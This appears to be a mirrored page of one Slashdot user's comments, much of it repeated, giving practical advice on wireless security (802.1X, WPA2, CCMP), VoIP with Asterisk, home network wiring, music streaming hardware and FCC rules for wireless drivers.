You seem to be asking several questions, or confusing several solutions, or both.
If you're looking for port-level authentication on your networks, wired or wireless, then IEEE 802.1X is the answer.
(dot)1X uses EAP (Extensible Authentication Protocol) Methods. MS gives you two big methods out of the box w/ the XP client: PEAP-MS-CHAPv2 (think: login/passwd) and EAP-TLS (think: digital certs), and provides the server level support in the form of certificate services, IAS (internet authentication server) and integration of both into the AD. Other methods are around, typically from other vendors (at additional cost). To impliment one not supported by MS out of the box, you need client-side and server side support.
IF (BIG IF) you have an MS infrastructure, your client machine logins are probably hanging off the domain controller, and use one of the above methods, or, can easily (and transparently to your users) move to one.
NOW, once either one is in place, implimenting port level auth is straightforward.... unless you do not have 100% XP clients. Nobody does in my experience (think: Printservers, other headless network clients). Then you get to get REALLY inventive with firewalls, vlans, switches, etc. and you can "get there". Taint gonna be easy....
There are open solutions on the client side, even in an MS infrastructure. Google for "wpa_supplicant".
NOW, back to your question: The MS PKI will prolly scale as well as AD itself. No better, worse.
This answer is deceptively simple. You have to overlay it on YOUR network, YOUR security policy, YOUR needs, YOUR level of expertise, etc.
MS does eat their own dawgf00d in this area, and I personally know some of the architects and implementors.
I AM NOT A MS FAN. That being said, they have (mostly) gotten this right.
There is a book from MS Press: Deploying Secure 802.11 Wireless Networks with Microsoft® Windows, ISBN: 0-7356-1939-5, which is obviously oriented on wireless nets, but which steps you through setting all of the.1X schtuff up.
Ya know, and I know this is going to sound lame, but, in my humble opinion, it all depends on personal relationships.
Like I pointed out, I've been doing business with the same person at CDW for almost 10 years.
He takes care of me.
I have no doubt, that if I punched out tomorrow, called my guy a week from now from a new company, that he would continue to take care of me. It's a personal relationship.
The other thing to realize is that ALL business partners have hic-ups. What sets one apart from the other is how they treat their customers (US) when it happens.
I've always been happy with the way I've been treated by my guy at CDW.
If they have it in stock, they WILL deliver, overnight if you need it that bad, and they stand behind their stuff. They have great relationships with their suppliers as well, so if you need pre-sales support, they can make that happen as well.
We (current company) sole-source our COMPAQ stuff through them, and I do not know of a single complaint. Once you have established an account, and done some business with them, you end up with a dedicated account team. I have been dealing personally with the guy who heads our team since 1997.
Asterisk is more than likely the ultimate solution to your problem.
- The bad news is that it has a VERY steep learning curve, that is unless you are expert in linux, telephony, and a few other odd disciplines, a relatively rare combination these days.
+ The good news is that you can test drive and get up and running quickly and cheaply with Asterisk @ Home..
Google for Asterisk @ Home. D/L the CD, take a SPARE box, one that you have no residual data on ('cause it's going to get zorched), insert the CD and follow the prompts. About an hour later, you will have an installed and (mostly) configured PBX with a web management GUI and a huge support community.
Believe it or not, you can install it in VMware and get a good feel for the functionality without sacrificing a box or boxen to the PBX gods.
The project is extraordinally well documented, and the only additional things you absolutely need to get started playing around are a soft phone (or an IP phone, or a ATA and an analog phone) and a Freeworld Diallup (no charge) account. A cheapass PCI card to connect to a single POTS line will run around $10 on E-pay.
All of this will take no more than a couple of hours, and you should be able to get a really good idea of what Asterisk is capable of doing.
Once you've convinced yourself (and your colleagues), you have some choices, namely, build it yourself or buy. I can't offer advice here.....
Some other potentially useful info-tidbits:
IP Phones are readily available starting at around $45US a set for cheapies (new, but low frills and crappy docco), up to several hundred a set for top-o-the-line units from folks like Cisco. I would personally recommend at least two or three for your pilot project, and not all the same model.
Beware the "power adaptor problem.' Some VoIP phones are designed to use POE (Power over Ethernet), where the switch provides the power over the ethernet cabling just like the phone company. If the phone sets are designed for this, they may not come with power bricks, and these particular bricks can be very expensive, and add considerably to the cost of the phone set.
ATAs (analog telephone adaptors) let you plug a phone (or a fax, or both) into an ethernet link connected to a VoIP lashup. These are what a LOT of the commercial VoIP providers furnish or provide at low cost. There are LOTS of these available on the secondary market, and many can be unlocked to use with any provider. I'd recommend you play with a couple different ones of these as well.
There is a metric a$$load of information on VoIP, Asterisk and Asterisk @ Home at VoIP-Info.org. Among other things, you can find info on which phones (soft, hard and ATAs) are well supported, and config info for lots of specific models.
phpWebSite looks like it has the features you're looking for, plus it:
Has a nice license (GPL / LGPL)
Is actively maintained by someone with a budget (Appalachian State University), who also actively uses the package, so it's not likely to be abandoned, go stagnant or have unpatched security issues
Blackhat / DEFCON is at the end of the month in Vegas. This is the scheduled patch release day (at least for MS) before the event.
The vendors have more than likely been notified by the "researchers" who discovered the issues, and are releasing their fixes on a coordinated schedule.
Buy -one- of each of the top three candidates. Conduct a trial to determine which works best, and what features from the #2 and #3 you would also like.
Now, find the local Vo-Tech and ask them if they would be interested in manufacturing a few custom carts to your specs.
Second, What's the budget and what are the uses of this wireless LAN?
- Budget directly influences what you CAN do, and how easily.
- Purpose should drive the design.
Specifically, if you are on the cheap, then the number and price of the APs, the infrastructure (interconnect, authentication servers, other....) are an issue
The intended use is also critical. Do you intend to open this WLAN to the world, or do you want to keep it private?
As others have mentioned, the Linksys WRT54G series is cheap, capable, and extendible, both in erms of firmware (to modify and extend the capability and security), hardware (external higher gain and/or directional antennas), enclosures (for outdoor deployment) and community, i.e. lotsa hax0rs are doing neat things with them.
Now, as far as range, I personally know of a major chain of truckstops in the US providing wireless hotspots. Their standard (doesn't work in every case) deployment is a single (high dollar, from a large router vendor) AP with a properly positioned (read, up in the air on a pole, with Line of Sight to all potential clients) external antenna. This typically covers the parking lot of the whole truckstop, which is significantly larger than the area you're discussing. I can't think of any reason you couldn't do the same with a WRT54G and the right (non linksys) firmware and antenna(s).
If you can't get sufficient coverage with one AP, if it's a WRT54G, grab the appropriate 3d party firmware (there are several to choose from), read up on either MESH or WDS and buy another one or two WRT54's to link together without stringing cables between buildings..
It will wither work for you or not. If not, you haven't pissed away a lot on hardware.
On the security front, do yourself a favor, and make sure everything you deploy is capable of supporting WPAII (the marketing name for IEEE 802.11i). You want AES (CCMP) as your cypher and IEEE 802.1X authentication back to an authentication server, but you may not be able to get there (software and driver wise) for a few months yet. Make sure any hardware you buy is capable. Authentication Server usually means RADIUS, and you can slay this dragon with MS IAS (if you have a windows server), or any of several free RADIUS servers on unix or winderz.
If you run TKIP or CCMP with preshared keys (WPA personal, or passphrase authentication), choose your passphrase carefully, lest you be subject to an off-line dictionary attack on the passphrase.
Seriously, if you travel via air, none of these work. If you travel, you are going to have to pack everything tool-wise, since nothing is allowed in your pockets anymore. Given that, Jensen is your friend.... That being said, there's nothing wrong with Craftsman. Visit your local Sears, and assemble a small kit. Consider including a 1/4" ratchet, sockets, and some pliers. I'd recommend a small set of vice-grip needlenose, a set of straight and curved needlenose w/ wirecutters, and a small set of snap ring pliers. A versatile bit-driver and a set of bits (flat, crosstip, hex, torx, security....) rounds it out. Not much you CAN'T work on give this, and it will all fit in a shaving kit.
For the nit-pickers, yes, I know that the TSA list specifics on exactly what is and is not allowed. Having printed the list out in preparation, and shown it to the agent at security, I still lost. My recommendation: give money to the EFF and don't piss on superman's cape in the mean time. John Gilmore is my hero.
First, Wireless (IEEE 802.11) IS at the state to keep HaX0rz out. I know, I was on the task group (IEEE 802.11i) that did the work. The keywords to look for in the marketplace are WPA or WPA2. Now, YOU have to turn the security on, and WEP is not the answer. At this point, I would only recommend equipment that is WPA2 (IEEE 802.11i) capable, and recommend using the AES or CCMP crypto option. TKIP works, but CCPM is the better option.
For the home, Since you're talking about strawbale, I'd run at least a parallel set of conduit to each wall, in each room (some rooms will need more that one pull or pair per wall, think kitchen). One should be for power, the other for "media". Pull CAT6 to the wall where you THINK you want it, pull the pull string to ALL of the others so that you, or the person you sell to down the road has max flexibility.
Include a wiring closet in the plans. Make sure there's enuf room for at least one full height 19" equipment rack in there. Tie ALL of the media runs to this room. Bring the cable TV, broadband network, telecom, etc into this room and distribute from there. Consider tieing some of the aforementioned "media" (CAT5-6) into blocks on the wall TELCO style. This affords flexibility later.
Even if you ignore most of my other advice, NEVER allow a contractor to remove or not leave a pull string in a conduit run. With a conduit in place, and a pull string, you can retro-fit a,most anything cheaply.
I personally would pull a ~2" PVC pipe from each room to the wireing closet, and outfit it with a pull string, just in case.....
If it's not already obvious, I'm advising you to build your house as if it were flex office space.
You're basically describing my wife's Christmas present..... I went to a little bit of trouble researching this...., so hopefully you will find something in the following useful:
FileServer: I have all of my tunes on a central server. This box's main function is to hold the files. This machine is running gentoo linux, and exports the files via samba and NFS. Anything else it does (see below) is ancillary, meaning it could be done with another entity (software or hardware). I know of others using a Linksys NSLU-2 with the "enhanced" firmware for the same purpose.
Server Software: I'm using mt-daapd. This is an implementation of the daap protocol used by iTunes to stream the music, and the revdevous (sp?) to publish the server location. It Just Works (tm). This currently runs on the Fileserver, but may not forever.
Players:
I selected Roku Soundbridges. I like the interface, and the display. They can access the network using either 10/100 wired ethernet, or 802.11b wireless and provide analog and digital outputs to feed either powered speakers or your stereo. I have two hanging off the same server setup described above, and they work great.
I can also "mount" the music shared in the manner described above with iTunes. I've only tested this w/ the winderz version, as there are no Macs in the house modern enuf to run iTunes.
What's curently missing here is the syncronized play. I also considered the Squeezebox from slim devices and decided I liked the Roku better. The Squeezebox uses Slimserver software to serve the music, and supports syncronized play. While the Roku can emulate a squeezebox and use the slimserver backend, I was not happy with the result and decided that synchronized play wasn't that important to me.
Some other random notes:
The slimserver software, and a software version of their client are available free from their web page. Try before you buy, or buy one squeezebox and use the software version on laptops elsewhere.
Roku _might_ implement synchronized play in the future. I see no reason why they could not.
Roku supports "tuning" internet radio stations. I plan to set up a stream, fed by another piece of software looking at the same set of files so that I have my own internet radio station in the house. I've used jwz's gronk, which is a web-based jukebox package for this purpose before with success, but will also consider grind this time around. I do not know if I will achieve synchronization this way or not, but I'm hoping.
Gronk and Grind do not use ID3 tags, so when I originally ripped a lot of my music for Gronk, I didn't care about the ID3s. All of the rest of this software DOES care, so I have a bit of a mess on my hands.
Gronk is written in Perl, so it's hackable. This comes in handy tweaking things like sort order, whether to include "the' in the band name, etc. JWZ also provides a demo version to play with on the site below.
Another way to get the synchronized music, and to serve over wireless, although not the way you originally asked, is to set up an FM transmitter. I have not yet done this for this project, but my prior Gronk installation supported one of those micropowered fm transmitters intended for use with mp3 players in cars just fine.
I was just thinking this morning how awesome it would be if I work on all of these computers (at least on the software side) without getting out of my chair.
You, sir, missed your calling. You should have been a UNIX sysadmin....
Now, where ARE my sandals and suspenders, anyway?
ObRealContent:
But seriously, this is why real computers, at least servers, typically have serial console ability hard-wired in and drop back to it when running headless or without a keyboard. Sun has had this for YEARS, and lots of higher end x86-based server hardware supports it as well. Plus, there's been support to one degree or another in the the Linux Kernel for a long time.
So, your solution, and I know this ain't the answer you were grepping for, is to buy hardware that supports a serial console, and use an OS which supports the hardware. For all others, particularly doing installs on PCs, a KVM is about as good as it gets.
Here's one response to the FCC issue (basically, there's higher risk if OSS vendors try to write their own firmware instead of appropriately licensed vendor-supplied firmware binaries)
This is probably true. It's also probably irrelevant. The issue, to a LAWYER, and let's not forget that they're the ones that matter in cases like this, is compliance with the law. Atheros' Lawyers care if they comply. If YOU reverse engineer the driver and in doing so, violate the FCC regs for power, frequency, etc., that's YOUR problem, not theirs. But they are legally not allowed to abet you (by giving you programatic access to these controls) in doing so.
All your stuff about radio licenses, considering that we're talking about unlicensed spectrum is silly and uninformed (I used to work for a cell/ss7/tcpip vendor and we dealt with LICENSED spectrum). If you stay under certain dB/wattages (which the -hardware- will restrict you to.....
This is just wrong. First of all, this is IEEE 802.11, not a cell phone. The radios in these chips will happily vary their power and frequencies if the driver tells them to because they are SOFTWARE CONTROLLED RADIOS, and the PHY (Physical Layer specification) for IEEE 802.11 REQUIRES them to operate this way, ie to vary their frequencies. The trick is that while the BAND is specified worldwide, the permitted frequencies within the band are specific to each country. Futher, the allowed radiated power can also vary locally.
I am not making this crap up, nor am I quoting from some trade rag, journal or online posting. I've spent the last several years as an active, voting participant in IEEE 802.11, sitting in the room with the engineers who design these chipsets and radios. If only one of them, from one company, had explained things this way, it would be one thing. But the reality is that this is the story from all of the mainstream chipset / radio vendors, and it's validated by the other folks in the room who specialize in regulatory issues.
So why do companies have a problem with free driver distribution?
A: In the case of wireless, the FCC plays a part.
An 802.11 Wireless Card is a software controlled radio, and must be licensed per FCC regs (in the USA, your country's rules might be different). Since the 802.11 PHY operates over several channels within the specified band, it must be able to select and switch between these channels via software, and to adjust its transmit power for optimum performance based on the changes in temperature of the transmitter, and changes in the frequency, among other things.
But different regulatory domains (countries) allow different channels within the bands, meaning a card in the US may be able to operate on a channel in the B band which is not licensed for another country, or vice versa. This is particularly true in the A band, where a whole middle "chunk" is not legal for use in the US.
Bottom line is that in order for the producer to get a license for the radio (and trust me, you do NOT want it to be the case that you, the operator, have to secure that license), he is NOT ALLOWED to expose the controls for power, et al, to the end user.
Now, if the driver / firmware (distinction / similarity discussed elsewhere in the thread) is open source, then by definition the controls in question are exposed to the end user. There would be nothing to prevent an end user from operating his card at a higher than legal power, or outside the legal freqs for the local regulatory domain.
NOW, all that being said, that is not to say that SOME hardware manufacturers haven't tried to do the right thing, and strike a compromise.
The MAD-WiFi Project http://sourceforge.net/projects/madwifi, (FAQ here) produces an open driver for the cards with Atheros chipsets. The bulk of the code is open, and under a good license. To meet the FCC requirements, they implement the "required to be secret" controls in a binary-only Hardware Abstraction Layer (HAL), but the rest of the code is open, free for you to read and modify.
And it works. I'm typing this through a Netgear card, running the MAD-WiFi driver (with TKIP encryption, IEEE 802.11i 4-way handshake and authentication handled by wpa_supplicant) on Gentoo Linux.
Credit is due to Sam Lefler and most importantly to Greg Chesson (of Atheros). Yes, it's that Greg Chesson, the same one mentioned of late by Rob Pike in his recent./ interview.
Note that, AFAICT, all of this happened without Theo de Raadt pimping around or making an ass of himself, as he is want to do. Disclaimer: I lost patience with Theo and TheoBSD a long time ago.
Gronk rocks.... I've had it running for three or four years, and every alternative I've looked at sux.
It's even better if you drive it from something with a touchscreen. I've used Sharp Mobilon TriPad PV-6000 for this purpose and it works really well. Yeah, it runs WinCE, but Gronk works fine with the builtin browser, and the touchscreen makes it really nice.
Take two sheets of paper, label one FRONT and the other BACK.
With the notebook upside down, as you take a screw out, place on the BACK piece of paper in the same relative position it came from on the bottom of the notebook. If you have to flip it and pull screws from the top side, use the other sheet of paper.
I number of years ago, the LARGE (read beltway bandit) contracting firm I was working for landed a private contract with a major insurance firm. Said firm had been NAILed in a class action lawsuit, and as part of the resultant consent decree, had to digitize ALL of it's paper policies and contracts, going back years. This averaged over 90 front-and-back pages per customer, and there were millions of customers. They had (originally) about 90 days to get it done.
This insurance company custom built several scan assembly lines, which used automated (Xerox IIRC) scanners and document handlers, as well as lots of custom software (that we customized).
This was more than seven years ago, so I would be suprised if the core technology isn't available at Kinkos or maybe even somewhere within your own university. Ask around, and if it's not there, call the local Xerox rep and ask to have one of the devices out on a demo. Whether the uni buys one or not, you can probably get YOUR work done, and make YOUR prof happy.
There is no way that 802.11i is going to change anything about CCMP.
I agree, it's unlikely, but possible. Sponsor ballot (and I'm a voter there, too) is NOT the final stage, so a change might come, but again, it is unlikely.
I'm much more concerned about interoperability issues. One thing that I have learned is that if something isn't 3d party tested, it will not interoperate. In the course of operating a commercial interoperability testing and certification program for IPSec products, we have to date, after 6 years of testing, NEVER seen a product submitted which did not require corrections in order to interoperate. This is not a comment on coding quality, FWIW. Interoperability is HARD, and far from automatic, even if there is a good standard to follow.
Now, will I see you in the group of grumpy folks in Anaheim?
I'm sure it's centrally managed, probably through a radius server. This scales just fine, as you enter a MAC once, on the central server. Imagine doing that on EACH AP individually. For extremely large deployments like your university, it's easy to see that no AP would have the internal capacity to store that many MACs, so they more or less have to do it centrally.
You can also bet these are not consumer-grade access points like the original poster seemed to be leaning towards, but higher end units. Consumer-grade stuff is priced at around $100 US, while the enterprise class APs intended for this kind of deployment cost hundreds.
As far as the actual data entry, it doesn't have to be a knuckle drill.... why do you think they bar code the MAC onto the NIC?
FWIW, I'm on the IEEE 802.11i standards committee that built WPA and the rest of it....
I would recommend that you implement (now) WPA with TKIP encryption. If you're a MS shop, and have an Active Directory infrastructure, adding MS IAS (internet authentication server) to that is very easy, and you're probably already licensed. Then you get to choose between authentication methods, and MS supports (and integrates into XP) EAP-MS-CHAP and EAP-TLS, basically login/passwd and digital certs, respectively. I would avoid Preshared Secret Keys (PSKs) due to their vulnerability to off-line dictionary attacks, unless you're willing to generate the PSKs in a cryptographically sound manner and push the length out quite a bit.
Likewise, I would counsel caution about using the AES encryption. If you purchase all of your gear from one vendor, you'll probably be OK, but there are a couple of gotcha's that you need to know about. First, the IEEE 802.11i standard which specifies CCMP (the AES crypto) is not yet final. It's extremely unlikely, but it _could_ change (we meet next week). Any vendor you choose today would likely provide updates in the event of a change, but who knows. More importantly, because the 11i is not final, the Wi-Fi Alliance has not yet integrated CCMP into their testing. So not only do you have absolutely no guarantee of interoperability, no one other than the vendor has tested the crypto implementation. Most crypto folks have a good feeling about AES, but no sane cryptographer trusts an implementation that hasn't been 3d party tested.
Unfortunately, if you need to support Linux, you're in for a hard time. I am not aware of a complete working set of client-side "stuff" to integrate into this lashup, although I did notice the beginnings of some support in the recent 2.6.5 kernel. Do NOT assume that you will be able to get linux working in this environment right now. It's comming..... but it's ain't there yet.
Now, on the subject of some of the other "advice" offered here....
Disabling broadcast of SSIDs is useless. It will hinder the performance of you network, and offers no improvement to your security whatsoever. The reason for this is simple: the SSID functions as a name for the wireless LAN, to enable a client to differentiate. Think of multi-client office buildings. Now, you can disable the broadcast of the SSID on the AP(s), but that does not remove the SSID from ALL of the wireless frames. Specifically, disabling broadcast removes the SSID from the BEACON transmitted by the AP, but the SSID MUST remain in the PROBE, PROBE-RESPONSE, ASSOCIATE-REQUEST and a few others for the network to work at all. All you have done is hide from netstumbler, but not from many of the other "stumblers".
As far as VPNs, if you already have one, integrate it into your plan. If not, don't sweat it.
Make SURE you disable support of WEP. It is possible to support both WEP and WPA, but it's an extremely bad idea, and WILL lead to the compromise of your network.
MAC screening is not a bad idea. MACs can be spoofed, so it's not foolproof, but it does help (some). It may not scale for you depending on the number of clients you have to support.
Check and see if your APs support time-based access controls, and if they don't look into placing them on "burglar timers", available inexpensively at Walmart, etc. The idea here is simple: disable access during non-business hours.
There is a book out from Microsoft Press that gives a lot of background, and takes you step-by-step through getting all of this crap up and running in their environment. I have met the author, and know a number of the contributors from the committee. I highly recommend it, available here. I sincerely hope all of this helps....
His rhetoric is quite predictable, actually. He talks at some length about how and why clusters of PCs can't get the job done, and how clustering is inherently inferior to a REAL SuperComputer, then goes on to describe how their new product (which sounds suprisingly like a cluster of propreitary machines) can work. Repeat the above as it applies to the management software.
If clustering doesn't work, and Supers are better / cheaper, explain why large companies (Pixar, NVidia,...) Government Labs (Los Alamos National Labs, Sandia National Labs,...) have invested, and are continuing to invest in and support their clusters.
Note that this does NOT mean that clusters are suitable for ALL traditional SuperComputing tasks. It really depends on the problem. If the problem is better solved with a vector processor, then a vector machine (like a Cray) is what you want. If the problem is solvable in parallel, then a cluster might be the right answer.
Specifically, IMNSHO, MediaWiki. This is the software used by the Wikipedia and other projects, which ensures that it is under active development, and getting a lot of attention. Among other features, it has
Extremely simple, yet rich markup
Automagical Tables of Contents
Easy support for tables
Support for TeX markup for mathematical formulae (if needed)
Support for embedded images
Ability to diff with previous interations of an article and roll back changes if needed
A wiki brings a lot to the table to facilitate documentation, and excels at cooperative documentation. We're using MediaWiki software internally with some success. Installation is not difficult (requires MySQL, PHP and Apache) and is well documented. Any web browser is used to view and / or edit documents, and the resultant HTML may be saved and viewed off-line.
...my health care provider doesn't cover ideologuectomies. They claim that it doesn't threaten your physical life, just your social one...
Ah.... I've met RMS a number of times, and having once made the mistake of standing downwind, am familiar with this problem. Try Soap and Water, augmented with a long-handled stiff brush. Pardon the Pun, but Lather, Rinse, Repeat. Works wonders for your complexion, with immediate secondary positive effects on the `ol social life...
If a project fails, and nobody's ever even heard of it, has it really failed?
I know Crispin Cowan personally, and I have never heard of this project! Maybe some of the DARPA funding should have gone to advertising, publicity, or (God forbid) Marketing?
Slashdot Mirror
You seem to be asking several questions, or confusing several solutions, or both.
.1X schtuff up.
If you're looking for port-level authentication on your networks, wired or wireless, then IEEE 802.1X is the answer.
(dot)1X uses EAP (Extensible Authentication Protocol) Methods. MS gives you two big methods out of the box w/ the XP client: PEAP-MS-CHAPv2 (think: login/passwd) and EAP-TLS (think: digital certs), and provides the server level support in the form of certificate services, IAS (internet authentication server) and integration of both into the AD. Other methods are around, typically from other vendors (at additional cost). To impliment one not supported by MS out of the box, you need client-side and server side support.
IF (BIG IF) you have an MS infrastructure, your client machine logins are probably hanging off the domain controller, and use one of the above methods, or, can easily (and transparently to your users) move to one.
NOW, once either one is in place, implimenting port level auth is straightforward.... unless you do not have 100% XP clients. Nobody does in my experience (think: Printservers, other headless network clients). Then you get to get REALLY inventive with firewalls, vlans, switches, etc. and you can "get there". Taint gonna be easy....
There are open solutions on the client side, even in an MS infrastructure. Google for "wpa_supplicant".
NOW, back to your question: The MS PKI will prolly scale as well as AD itself. No better, worse.
This answer is deceptively simple. You have to overlay it on YOUR network, YOUR security policy, YOUR needs, YOUR level of expertise, etc.
MS does eat their own dawgf00d in this area, and I personally know some of the architects and implementors.
I AM NOT A MS FAN. That being said, they have (mostly) gotten this right.
There is a book from MS Press: Deploying Secure 802.11 Wireless Networks with Microsoft® Windows, ISBN: 0-7356-1939-5, which is obviously oriented on wireless nets, but which steps you through setting all of the
Recommended....
I sincerely hope this helps..
-RED
Ya know, and I know this is going to sound lame, but, in my humble opinion, it all depends on personal relationships.
Like I pointed out, I've been doing business with the same person at CDW for almost 10 years.
He takes care of me.
I have no doubt, that if I punched out tomorrow, called my guy a week from now from a new company, that he would continue to take care of me. It's a personal relationship.
The other thing to realize is that ALL business partners have hic-ups. What sets one apart from the other is how they treat their customers (US) when it happens.
I've always been happy with the way I've been treated by my guy at CDW.
RED
I've been doing business with them through three employers, for almost 15 years.
And for the record, I'm talking about CDW
If they have it in stock, they WILL deliver, overnight if you need it that bad, and they stand behind their stuff. They have great relationships with their suppliers as well, so if you need pre-sales support, they can make that happen as well.
We (current company) sole-source our COMPAQ stuff through them, and I do not know of a single complaint. Once you have established an account, and done some business with them, you end up with a dedicated account team. I have been dealing personally with the guy who heads our team since 1997.
Recommended......
-RED
- The bad news is that it has a VERY steep learning curve, that is unless you are expert in linux, telephony, and a few other odd disciplines, a relatively rare combination these days.
+ The good news is that you can test drive and get up and running quickly and cheaply with Asterisk @ Home..
Google for Asterisk @ Home. D/L the CD, take a SPARE box, one that you have no residual data on ('cause it's going to get zorched), insert the CD and follow the prompts. About an hour later, you will have an installed and (mostly) configured PBX with a web management GUI and a huge support community.
Believe it or not, you can install it in VMware and get a good feel for the functionality without sacrificing a box or boxen to the PBX gods.
The project is extraordinally well documented, and the only additional things you absolutely need to get started playing around are a soft phone (or an IP phone, or a ATA and an analog phone) and a Freeworld Diallup (no charge) account. A cheapass PCI card to connect to a single POTS line will run around $10 on E-pay.
All of this will take no more than a couple of hours, and you should be able to get a really good idea of what Asterisk is capable of doing.
Once you've convinced yourself (and your colleagues), you have some choices, namely, build it yourself or buy. I can't offer advice here.....
Some other potentially useful info-tidbits:
Hope this helps.....
--Red
Hope this helps....
Red
Look at the calendar.
Blackhat / DEFCON is at the end of the month in Vegas. This is the scheduled patch release day (at least for MS) before the event.
The vendors have more than likely been notified by the "researchers" who discovered the issues, and are releasing their fixes on a coordinated schedule.
Seriously:
No one else has a hope of pulling an information indexing and retrieval project of this scale off, and they excel at exactly this kind of thing.
Plus, there's that "First, do no evil...." motto.
--Red
Buy -one- of each of the top three candidates. Conduct a trial to determine which works best, and what features from the #2 and #3 you would also like.
Now, find the local Vo-Tech and ask them if they would be interested in manufacturing a few custom carts to your specs.
First, this is do-able.
Second, What's the budget and what are the uses of this wireless LAN?
- Budget directly influences what you CAN do, and how easily.
- Purpose should drive the design.
Specifically, if you are on the cheap, then the number and price of the APs, the infrastructure (interconnect, authentication servers, other....) are an issue
The intended use is also critical. Do you intend to open this WLAN to the world, or do you want to keep it private?
As others have mentioned, the Linksys WRT54G series is cheap, capable, and extendible, both in erms of firmware (to modify and extend the capability and security), hardware (external higher gain and/or directional antennas), enclosures (for outdoor deployment) and community, i.e. lotsa hax0rs are doing neat things with them.
Now, as far as range, I personally know of a major chain of truckstops in the US providing wireless hotspots. Their standard (doesn't work in every case) deployment is a single (high dollar, from a large router vendor) AP with a properly positioned (read, up in the air on a pole, with Line of Sight to all potential clients) external antenna. This typically covers the parking lot of the whole truckstop, which is significantly larger than the area you're discussing. I can't think of any reason you couldn't do the same with a WRT54G and the right (non linksys) firmware and antenna(s).
If you can't get sufficient coverage with one AP, if it's a WRT54G, grab the appropriate 3d party firmware (there are several to choose from), read up on either MESH or WDS and buy another one or two WRT54's to link together without stringing cables between buildings..
It will wither work for you or not. If not, you haven't pissed away a lot on hardware.
On the security front, do yourself a favor, and make sure everything you deploy is capable of supporting WPAII (the marketing name for IEEE 802.11i). You want AES (CCMP) as your cypher and IEEE 802.1X authentication back to an authentication server, but you may not be able to get there (software and driver wise) for a few months yet. Make sure any hardware you buy is capable. Authentication Server usually means RADIUS, and you can slay this dragon with MS IAS (if you have a windows server), or any of several free RADIUS servers on unix or winderz.
If you run TKIP or CCMP with preshared keys (WPA personal, or passphrase authentication), choose your passphrase carefully, lest you be subject to an off-line dictionary attack on the passphrase.
I hope this helps.....
Red
Someone mod parent up....
Seriously, if you travel via air, none of these work. If you travel, you are going to have to pack everything tool-wise, since nothing is allowed in your pockets anymore. Given that, Jensen is your friend.... That being said, there's nothing wrong with Craftsman. Visit your local Sears, and assemble a small kit. Consider including a 1/4" ratchet, sockets, and some pliers. I'd recommend a small set of vice-grip needlenose, a set of straight and curved needlenose w/ wirecutters, and a small set of snap ring pliers. A versatile bit-driver and a set of bits (flat, crosstip, hex, torx, security....) rounds it out. Not much you CAN'T work on give this, and it will all fit in a shaving kit.
For the nit-pickers, yes, I know that the TSA list specifics on exactly what is and is not allowed. Having printed the list out in preparation, and shown it to the agent at security, I still lost. My recommendation: give money to the EFF and don't piss on superman's cape in the mean time. John Gilmore is my hero.
No links to the above, other than Pseudo-Google.
If it's not already obvious, I'm advising you to build your house as if it were flex office space.
FileServer: I have all of my tunes on a central server. This box's main function is to hold the files. This machine is running gentoo linux, and exports the files via samba and NFS. Anything else it does (see below) is ancillary, meaning it could be done with another entity (software or hardware). I know of others using a Linksys NSLU-2 with the "enhanced" firmware for the same purpose.
Server Software: I'm using mt-daapd. This is an implementation of the daap protocol used by iTunes to stream the music, and the revdevous (sp?) to publish the server location. It Just Works (tm). This currently runs on the Fileserver, but may not forever.
Players:
What's curently missing here is the syncronized play. I also considered the Squeezebox from slim devices and decided I liked the Roku better. The Squeezebox uses Slimserver software to serve the music, and supports syncronized play. While the Roku can emulate a squeezebox and use the slimserver backend, I was not happy with the result and decided that synchronized play wasn't that important to me.
Some other random notes:
Links:
Linksys NSLU-2
Unslung firmware for the NSLU-2
Roku Soundbridge
Squeezebox and Slimserver
mt-daapd on Sourceforge
JWZ's Gronk
Grind
A review of a REAL FM transmitter
You, sir, missed your calling. You should have been a UNIX sysadmin....
Now, where ARE my sandals and suspenders, anyway?
ObRealContent:
But seriously, this is why real computers, at least servers, typically have serial console ability hard-wired in and drop back to it when running headless or without a keyboard. Sun has had this for YEARS, and lots of higher end x86-based server hardware supports it as well. Plus, there's been support to one degree or another in the the Linux Kernel for a long time.
So, your solution, and I know this ain't the answer you were grepping for, is to buy hardware that supports a serial console, and use an OS which supports the hardware. For all others, particularly doing installs on PCs, a KVM is about as good as it gets.
I am not making this crap up, nor am I quoting from some trade rag, journal or online posting. I've spent the last several years as an active, voting participant in IEEE 802.11, sitting in the room with the engineers who design these chipsets and radios. If only one of them, from one company, had explained things this way, it would be one thing. But the reality is that this is the story from all of the mainstream chipset / radio vendors, and it's validated by the other folks in the room who specialize in regulatory issues.
A: In the case of wireless, the FCC plays a part.
An 802.11 Wireless Card is a software controlled radio, and must be licensed per FCC regs (in the USA, your country's rules might be different). Since the 802.11 PHY operates over several channels within the specified band, it must be able to select and switch between these channels via software, and to adjust its transmit power for optimum performance based on the changes in temperature of the transmitter, and changes in the frequency, among other things.
But different regulatory domains (countries) allow different channels within the bands, meaning a card in the US may be able to operate on a channel in the B band which is not licensed for another country, or vice versa. This is particularly true in the A band, where a whole middle "chunk" is not legal for use in the US.
Bottom line is that in order for the producer to get a license for the radio (and trust me, you do NOT want it to be the case that you, the operator, have to secure that license), he is NOT ALLOWED to expose the controls for power, et al, to the end user.
Now, if the driver / firmware (distinction / similarity discussed elsewhere in the thread) is open source, then by definition the controls in question are exposed to the end user. There would be nothing to prevent an end user from operating his card at a higher than legal power, or outside the legal freqs for the local regulatory domain.
NOW, all that being said, that is not to say that SOME hardware manufacturers haven't tried to do the right thing, and strike a compromise.
The MAD-WiFi Project http://sourceforge.net/projects/madwifi, (FAQ here) produces an open driver for the cards with Atheros chipsets. The bulk of the code is open, and under a good license. To meet the FCC requirements, they implement the "required to be secret" controls in a binary-only Hardware Abstraction Layer (HAL), but the rest of the code is open, free for you to read and modify.
And it works. I'm typing this through a Netgear card, running the MAD-WiFi driver (with TKIP encryption, IEEE 802.11i 4-way handshake and authentication handled by wpa_supplicant) on Gentoo Linux.
Credit is due to Sam Lefler and most importantly to Greg Chesson (of Atheros). Yes, it's that Greg Chesson, the same one mentioned of late by Rob Pike in his recent ./ interview.
Note that, AFAICT, all of this happened without Theo de Raadt pimping around or making an ass of himself, as he is want to do. Disclaimer: I lost patience with Theo and TheoBSD a long time ago.
Gronk rocks.... I've had it running for three or four years, and every alternative I've looked at sux.
It's even better if you drive it from something with a touchscreen. I've used Sharp Mobilon TriPad PV-6000 for this purpose and it works really well. Yeah, it runs WinCE, but Gronk works fine with the builtin browser, and the touchscreen makes it really nice.
Don't make it any harder than you have to...
Take two sheets of paper, label one FRONT and the other BACK.
